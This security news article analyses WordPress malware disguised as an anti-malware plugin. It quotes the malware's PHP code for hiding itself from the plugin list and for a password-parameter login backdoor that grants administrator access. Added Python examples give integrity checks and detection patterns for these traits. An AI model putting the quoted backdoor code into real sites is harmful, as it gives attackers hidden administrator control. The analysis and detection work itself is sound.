Sophisticated malware disguised as a WordPress security plugin
A sophisticated piece of malware disguised as a WordPress security plugin has been discovered. It gives attackers persistent access through capabilities such as hiding itself, remote code execution and obtaining administrator privileges. The malware communicates with a C&C server located in Cyprus and can reinstall itself by modifying the wp-cron.php file. Researchers have developed detection signatures and are rolling out protections in stages. 2025-5-1 12:45:43 Author: cybersecuritynews.com

New WordPress Malware as Anti-Malware Plugin Take Full Control of Website

A sophisticated malware variant masquerading as a legitimate WordPress security plugin has been identified, capable of providing attackers with persistent access to compromised websites.

The malicious code appears in the file system under innocuous names such as ‘WP-antymalwary-bot.php’ or ‘wp-performance-booster.php’, creating a facade of legitimacy while harboring dangerous capabilities including remote code execution, administrator access provision, and malicious code injection.

This deceptive malware contains several functions that allow attackers to maintain backdoor access, execute arbitrary code remotely, and inject malicious JavaScript responsible for serving unwanted advertisements.


The plugin’s design includes mechanisms to ping Command & Control (C&C) servers, providing attackers with real-time information about infected sites and enabling coordinated attacks across compromised platforms.

Wordfence researchers identified the malware during a routine site cleanup on January 22, 2025, noting its unusual sophistication and the careful effort to mimic legitimate plugin architecture.

The security team subsequently developed detection signatures and released them to premium customers by January 24, with free version users scheduled to receive protection by May 23, 2025.

The malware’s insidious nature lies in its ability to reinfect websites even after apparent removal.

It achieves this persistence by modifying the WordPress wp-cron.php file, which automatically reinstalls the malicious plugin if deleted.

This creates a challenging remediation scenario for website administrators who may believe they’ve successfully removed the threat.

What makes this threat particularly concerning is its ability to communicate with a C&C server located in Cyprus. Every minute, the malware sends the infected site’s URL and a timestamp, enabling attackers to maintain an updated inventory of compromised websites.
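Because the reinfection path runs through a modified core file, the most direct control is routine integrity checking of the WordPress tree against hashes pinned right after a clean install or cleanup. The following is an added example for illustration, not code from the article or from Wordfence; the file contents and the manifest are constructed sample data rather than real WordPress checksums, and the function names are this example's own.

```python
"""Pinned-hash integrity check for a WordPress tree (added example).

The snapshot is taken immediately after a clean install or a completed
cleanup, so any later drift in wp-cron.php, and any plugin file that
reappears after deletion, shows up in the report.
"""
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict[str, bytes]) -> dict[str, str]:
    """Snapshot a known-good tree as path -> sha256."""
    return {path: sha256_hex(content) for path, content in files.items()}


def verify_tree(manifest: dict[str, str], files: dict[str, bytes]) -> dict[str, list[str]]:
    """Compare the current tree to the manifest.

    modified   : pinned files whose hash no longer matches (e.g. wp-cron.php)
    missing    : pinned files that have disappeared
    unexpected : files present now that were not in the snapshot
    """
    modified = sorted(p for p in manifest if p in files and sha256_hex(files[p]) != manifest[p])
    missing = sorted(p for p in manifest if p not in files)
    unexpected = sorted(p for p in files if p not in manifest)
    return {"modified": modified, "missing": missing, "unexpected": unexpected}


# Constructed sample: a clean tree as snapshotted after cleanup ...
CLEAN_TREE = {
    "wp-cron.php": b"<?php\n// core cron runner (constructed stand-in)\n",
    "wp-load.php": b"<?php\n// constructed stand-in\n",
    "wp-content/plugins/akismet/akismet.php": b"<?php\n// constructed stand-in\n",
}
MANIFEST = build_manifest(CLEAN_TREE)

# ... and the same tree after the reinfection mechanism the article describes:
# wp-cron.php has extra code appended and the fake plugin file is back.
TAMPERED_TREE = dict(CLEAN_TREE)
TAMPERED_TREE["wp-cron.php"] = CLEAN_TREE["wp-cron.php"] + b"// constructed injected line\n"
TAMPERED_TREE["wp-content/plugins/WP-antymalwary-bot.php"] = b"<?php\n// constructed\n"


def demo() -> dict[str, list[str]]:
    return verify_tree(MANIFEST, TAMPERED_TREE)


if __name__ == "__main__":
    print(demo())
```

In practice the manifest is stored off-host (an attacker who can write wp-cron.php can also rewrite a manifest kept beside it), and the check is scheduled from outside the site, not from WordPress's own cron. For core files specifically, the same idea is available ready-made as `wp core verify-checksums` in WP-CLI, which compares against WordPress.org's published hashes.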

Sophisticated Evasion Techniques

The malware employs several methods to avoid detection, most notably by hiding itself from the WordPress dashboard through specialized functions:

// Function to hide plugin from list
function hide_plugin_from_list($plugins) {
    if (is_admin() && isset($plugins[plugin_basename(__FILE__)])) {
        unset($plugins[plugin_basename(__FILE__)]);
    }
    return $plugins;
}
add_filter('all_plugins', 'hide_plugin_from_list');

This deception extends to how it gains unauthorized access. The malware implements an emergency login function that bypasses normal authentication by using a predefined password parameter.

When triggered, it automatically grants administrator privileges by hijacking the first administrator account it finds:

function emergency_login_all_admins() {
    if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === [REDACTED]) {
        $admins = get_users(['role' => 'administrator']);
        if (!empty($admins)) {
            $admin = reset($admins);
            wp_set_auth_cookie($admin->ID, true);
            wp_redirect(admin_url());
            exit;
        }
    }
}
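Both snippets above leave static fingerprints that a defender can triage for: a plugin that hooks `all_plugins` and unsets its own basename, and a file that calls `wp_set_auth_cookie()` on the strength of a raw request parameter. The bypass parameter also lands in web server access logs. The following is an added example, not code from the article or from Wordfence: the plugin sources and log lines are constructed samples, the placeholder `PLACEHOLDER` stands in for the redacted password, and the indicator names are this example's own. The regexes are heuristics, so a hit means "open this file", not "this is malware" (social-login plugins, for instance, legitimately set auth cookies after reading request input).

```python
"""Static triage for the self-hide and auth-bypass patterns, plus an
access-log check for the bypass parameter (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Indicator SELF_HIDE: the plugin removes its own entry from the all_plugins list.
HIDE_HOOK = re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")
HIDE_UNSET = re.compile(r"unset\(\s*\$\w+\[\s*plugin_basename\(\s*__FILE__\s*\)\s*\]")

# Indicator AUTH_BACKDOOR: an auth cookie is set in a file that reads request input.
AUTH_COOKIE = re.compile(r"wp_set_auth_cookie\(")
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST)\[")


def triage_plugin_source(source: str) -> list[str]:
    """Return the indicator names that fire on one PHP source file."""
    hits = []
    if HIDE_HOOK.search(source) and HIDE_UNSET.search(source):
        hits.append("SELF_HIDE")
    if AUTH_COOKIE.search(source) and REQUEST_INPUT.search(source):
        hits.append("AUTH_BACKDOOR")
    return hits


# Combined log format: ip ident user [ts] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def bypass_attempts(log_lines: list[str], param: str = "emergency_login") -> list[tuple[str, str, str]]:
    """Return (ip, timestamp, path) for every request carrying the bypass query parameter."""
    found = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if param in parse_qs(parts.query):
            found.append((m["ip"], m["ts"], parts.path))
    return found


# Constructed sample: the two fragments quoted in the article, condensed into one file.
SAMPLE_BACKDOOR = """<?php
function hide_plugin_from_list($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);
    return $plugins;
}
add_filter('all_plugins', 'hide_plugin_from_list');
if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === 'PLACEHOLDER') {
    wp_set_auth_cookie($admin->ID, true);
}
"""

# Constructed sample: an ordinary content filter, no indicators.
SAMPLE_BENIGN = """<?php
add_filter('the_content', 'my_prefix_filter_content');
"""

# Constructed access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jan/2025:10:15:01 +0000] "GET /?emergency_login=PLACEHOLDER HTTP/1.1" 302 0',
    '198.51.100.4 - - [22/Jan/2025:10:15:09 +0000] "GET /wp-login.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/Jan/2025:10:16:02 +0000] "GET /wp-cron.php?emergency_login=PLACEHOLDER HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print(triage_plugin_source(SAMPLE_BACKDOOR), triage_plugin_source(SAMPLE_BENIGN))
    print(bypass_attempts(SAMPLE_LOG))
```

A 302 to `/wp-admin/` immediately following a request with the parameter is the confirming pattern in the log, since the backdoor redirects to `admin_url()` after setting the cookie; once confirmed, the response is to rotate all administrator credentials and salts, not only to delete the file, because the wp-cron.php persistence will otherwise bring it back.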

This emerging threat represents a concerning evolution in WordPress-targeted malware, combining legitimate-appearing code structures with persistent infection mechanisms and sophisticated backdoor capabilities.



Source: https://cybersecuritynews.com/new-wordpress-malware-as-anti-malware-plugin/